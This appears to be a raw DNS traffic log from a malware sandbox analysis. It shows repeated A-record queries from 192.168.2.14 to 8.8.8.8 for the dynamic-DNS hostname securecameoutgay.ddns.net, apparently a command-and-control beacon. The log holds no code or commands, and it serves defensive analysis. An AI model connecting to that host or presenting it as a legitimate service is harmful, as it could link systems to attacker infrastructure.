                                                    Oct 12, 2024 23:06:00.418167114 CEST192.168.2.148.8.8.80xaae2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.424633980 CEST192.168.2.148.8.8.80xaae2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.431329966 CEST192.168.2.148.8.8.80xaae2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.437901974 CEST192.168.2.148.8.8.80x8953Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.444721937 CEST192.168.2.148.8.8.80x8953Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.451303959 CEST192.168.2.148.8.8.80x8953Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.458039999 CEST192.168.2.148.8.8.80x8953Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.464482069 CEST192.168.2.148.8.8.80x8953Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.471400976 CEST192.168.2.148.8.8.80xdc88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.477720976 CEST192.168.2.148.8.8.80xdc88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.484364986 CEST192.168.2.148.8.8.80xdc88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.490894079 CEST192.168.2.148.8.8.80xdc88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.497392893 CEST192.168.2.148.8.8.80xdc88Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.504074097 CEST192.168.2.148.8.8.80x41eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.510775089 CEST192.168.2.148.8.8.80x41eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.517564058 CEST192.168.2.148.8.8.80x41eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.524059057 CEST192.168.2.148.8.8.80x41eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.530635118 CEST192.168.2.148.8.8.80x41eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.537147999 CEST192.168.2.148.8.8.80x5fb9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.543591022 CEST192.168.2.148.8.8.80x5fb9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.550071955 CEST192.168.2.148.8.8.80x5fb9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.556447983 CEST192.168.2.148.8.8.80x5fb9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.562895060 CEST192.168.2.148.8.8.80x5fb9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.569622993 CEST192.168.2.148.8.8.80x6cd2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.576188087 CEST192.168.2.148.8.8.80x6cd2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.582576990 CEST192.168.2.148.8.8.80x6cd2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.589045048 CEST192.168.2.148.8.8.80x6cd2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.595554113 CEST192.168.2.148.8.8.80x6cd2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.603298903 CEST192.168.2.148.8.8.80x34adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.609751940 CEST192.168.2.148.8.8.80x34adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.616091013 CEST192.168.2.148.8.8.80x34adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.622275114 CEST192.168.2.148.8.8.80x34adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.628595114 CEST192.168.2.148.8.8.80x34adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.634994984 CEST192.168.2.148.8.8.80xfb0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.641490936 CEST192.168.2.148.8.8.80xfb0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.648027897 CEST192.168.2.148.8.8.80xfb0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.654459000 CEST192.168.2.148.8.8.80xfb0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.660872936 CEST192.168.2.148.8.8.80xfb0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.667367935 CEST192.168.2.148.8.8.80x38aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.673872948 CEST192.168.2.148.8.8.80x38aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.680182934 CEST192.168.2.148.8.8.80x38aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.686532021 CEST192.168.2.148.8.8.80x38aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.706801891 CEST192.168.2.148.8.8.80x38aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.716392040 CEST192.168.2.148.8.8.80xa9f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.725212097 CEST192.168.2.148.8.8.80xa9f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.732070923 CEST192.168.2.148.8.8.80xa9f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.738869905 CEST192.168.2.148.8.8.80xa9f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.745341063 CEST192.168.2.148.8.8.80xa9f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.752221107 CEST192.168.2.148.8.8.80x929eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.758948088 CEST192.168.2.148.8.8.80x929eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.765485048 CEST192.168.2.148.8.8.80x929eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.772098064 CEST192.168.2.148.8.8.80x929eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.778511047 CEST192.168.2.148.8.8.80x929eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.785111904 CEST192.168.2.148.8.8.80xde61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.791666985 CEST192.168.2.148.8.8.80xde61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.798424006 CEST192.168.2.148.8.8.80xde61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.804910898 CEST192.168.2.148.8.8.80xde61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.811376095 CEST192.168.2.148.8.8.80xde61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.818120956 CEST192.168.2.148.8.8.80x4aaeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.824661016 CEST192.168.2.148.8.8.80x4aaeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.830923080 CEST192.168.2.148.8.8.80x4aaeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.837332964 CEST192.168.2.148.8.8.80x4aaeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.843952894 CEST192.168.2.148.8.8.80x4aaeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.850383043 CEST192.168.2.148.8.8.80x28aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.856618881 CEST192.168.2.148.8.8.80x28aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.863564014 CEST192.168.2.148.8.8.80x28aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.869846106 CEST192.168.2.148.8.8.80x28aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.876766920 CEST192.168.2.148.8.8.80x28aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.883326054 CEST192.168.2.148.8.8.80xcd41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.890039921 CEST192.168.2.148.8.8.80xcd41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.896339893 CEST192.168.2.148.8.8.80xcd41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.902697086 CEST192.168.2.148.8.8.80xcd41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.909128904 CEST192.168.2.148.8.8.80xcd41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.915550947 CEST192.168.2.148.8.8.80x74dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.922209024 CEST192.168.2.148.8.8.80x74dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.928761959 CEST192.168.2.148.8.8.80x74dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.937494040 CEST192.168.2.148.8.8.80x74dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.944081068 CEST192.168.2.148.8.8.80x74dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.950555086 CEST192.168.2.148.8.8.80x804cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.956929922 CEST192.168.2.148.8.8.80x804cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.963502884 CEST192.168.2.148.8.8.80x804cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.969882011 CEST192.168.2.148.8.8.80x804cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.976331949 CEST192.168.2.148.8.8.80x804cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.983472109 CEST192.168.2.148.8.8.80x127aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.990391970 CEST192.168.2.148.8.8.80x127aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:00.997783899 CEST192.168.2.148.8.8.80x127aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.005383015 CEST192.168.2.148.8.8.80x127aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.012613058 CEST192.168.2.148.8.8.80x127aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.019867897 CEST192.168.2.148.8.8.80x9fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.026855946 CEST192.168.2.148.8.8.80x9fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.033382893 CEST192.168.2.148.8.8.80x9fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.039822102 CEST192.168.2.148.8.8.80x9fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.046240091 CEST192.168.2.148.8.8.80x9fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.052943945 CEST192.168.2.148.8.8.80x8fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.059674978 CEST192.168.2.148.8.8.80x8fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.066406012 CEST192.168.2.148.8.8.80x8fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.073385000 CEST192.168.2.148.8.8.80x8fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.080499887 CEST192.168.2.148.8.8.80x8fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.087691069 CEST192.168.2.148.8.8.80x730aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.094435930 CEST192.168.2.148.8.8.80x730aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.101099968 CEST192.168.2.148.8.8.80x730aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.107860088 CEST192.168.2.148.8.8.80x730aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.114568949 CEST192.168.2.148.8.8.80x730aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.121213913 CEST192.168.2.148.8.8.80x4f1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.128388882 CEST192.168.2.148.8.8.80x4f1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.134949923 CEST192.168.2.148.8.8.80x4f1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.141483068 CEST192.168.2.148.8.8.80x4f1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.148099899 CEST192.168.2.148.8.8.80x4f1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.154537916 CEST192.168.2.148.8.8.80x811Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.160934925 CEST192.168.2.148.8.8.80x811Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.167646885 CEST192.168.2.148.8.8.80x811Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.174321890 CEST192.168.2.148.8.8.80x811Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.180530071 CEST192.168.2.148.8.8.80x811Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.187860012 CEST192.168.2.148.8.8.80xc07cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.194842100 CEST192.168.2.148.8.8.80xc07cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.201870918 CEST192.168.2.148.8.8.80xc07cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.208386898 CEST192.168.2.148.8.8.80xc07cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.215313911 CEST192.168.2.148.8.8.80xc07cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.222012997 CEST192.168.2.148.8.8.80xe52aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.228585005 CEST192.168.2.148.8.8.80xe52aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.235579014 CEST192.168.2.148.8.8.80xe52aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.242134094 CEST192.168.2.148.8.8.80xe52aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.248733997 CEST192.168.2.148.8.8.80xe52aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.255619049 CEST192.168.2.148.8.8.80x923cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.262234926 CEST192.168.2.148.8.8.80x923cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.268981934 CEST192.168.2.148.8.8.80x923cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.275480986 CEST192.168.2.148.8.8.80x923cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.282160044 CEST192.168.2.148.8.8.80x923cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.288693905 CEST192.168.2.148.8.8.80xd308Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.295533895 CEST192.168.2.148.8.8.80xd308Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.302212000 CEST192.168.2.148.8.8.80xd308Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.309534073 CEST192.168.2.148.8.8.80xd308Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.316229105 CEST192.168.2.148.8.8.80xd308Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.323141098 CEST192.168.2.148.8.8.80xda2dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.329375982 CEST192.168.2.148.8.8.80xda2dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.336010933 CEST192.168.2.148.8.8.80xda2dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.343326092 CEST192.168.2.148.8.8.80xda2dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.350264072 CEST192.168.2.148.8.8.80xda2dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.358450890 CEST192.168.2.148.8.8.80x364Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.366420984 CEST192.168.2.148.8.8.80x364Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.373070002 CEST192.168.2.148.8.8.80x364Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.379554033 CEST192.168.2.148.8.8.80x364Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.386017084 CEST192.168.2.148.8.8.80x364Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.393115997 CEST192.168.2.148.8.8.80xcc89Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.399539948 CEST192.168.2.148.8.8.80xcc89Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.406019926 CEST192.168.2.148.8.8.80xcc89Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.413106918 CEST192.168.2.148.8.8.80xcc89Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.419722080 CEST192.168.2.148.8.8.80xcc89Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.426929951 CEST192.168.2.148.8.8.80x5dddStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.433597088 CEST192.168.2.148.8.8.80x5dddStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.440485954 CEST192.168.2.148.8.8.80x5dddStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.447328091 CEST192.168.2.148.8.8.80x5dddStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.453696966 CEST192.168.2.148.8.8.80x5dddStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.460066080 CEST192.168.2.148.8.8.80xd790Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.466555119 CEST192.168.2.148.8.8.80xd790Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.473256111 CEST192.168.2.148.8.8.80xd790Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.479686975 CEST192.168.2.148.8.8.80xd790Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.486064911 CEST192.168.2.148.8.8.80xd790Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.492835045 CEST192.168.2.148.8.8.80x44dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.499958038 CEST192.168.2.148.8.8.80x44dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.506556034 CEST192.168.2.148.8.8.80x44dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.513029099 CEST192.168.2.148.8.8.80x44dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.519577026 CEST192.168.2.148.8.8.80x44dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.526380062 CEST192.168.2.148.8.8.80x5b7dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.533108950 CEST192.168.2.148.8.8.80x5b7dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.539798975 CEST192.168.2.148.8.8.80x5b7dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.546511889 CEST192.168.2.148.8.8.80x5b7dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.553518057 CEST192.168.2.148.8.8.80x5b7dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.560612917 CEST192.168.2.148.8.8.80x6cceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.567452908 CEST192.168.2.148.8.8.80x6cceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.574055910 CEST192.168.2.148.8.8.80x6cceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.580950022 CEST192.168.2.148.8.8.80x6cceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.587891102 CEST192.168.2.148.8.8.80x6cceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.594495058 CEST192.168.2.148.8.8.80xfb2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.601083040 CEST192.168.2.148.8.8.80xfb2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.607950926 CEST192.168.2.148.8.8.80xfb2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.614689112 CEST192.168.2.148.8.8.80xfb2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.621439934 CEST192.168.2.148.8.8.80xfb2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.628134966 CEST192.168.2.148.8.8.80x6a92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.634963989 CEST192.168.2.148.8.8.80x6a92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.641499043 CEST192.168.2.148.8.8.80x6a92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.648194075 CEST192.168.2.148.8.8.80x6a92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.655014992 CEST192.168.2.148.8.8.80x6a92Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.662051916 CEST192.168.2.148.8.8.80x266eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.668950081 CEST192.168.2.148.8.8.80x266eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.675719023 CEST192.168.2.148.8.8.80x266eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.682929039 CEST192.168.2.148.8.8.80x266eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
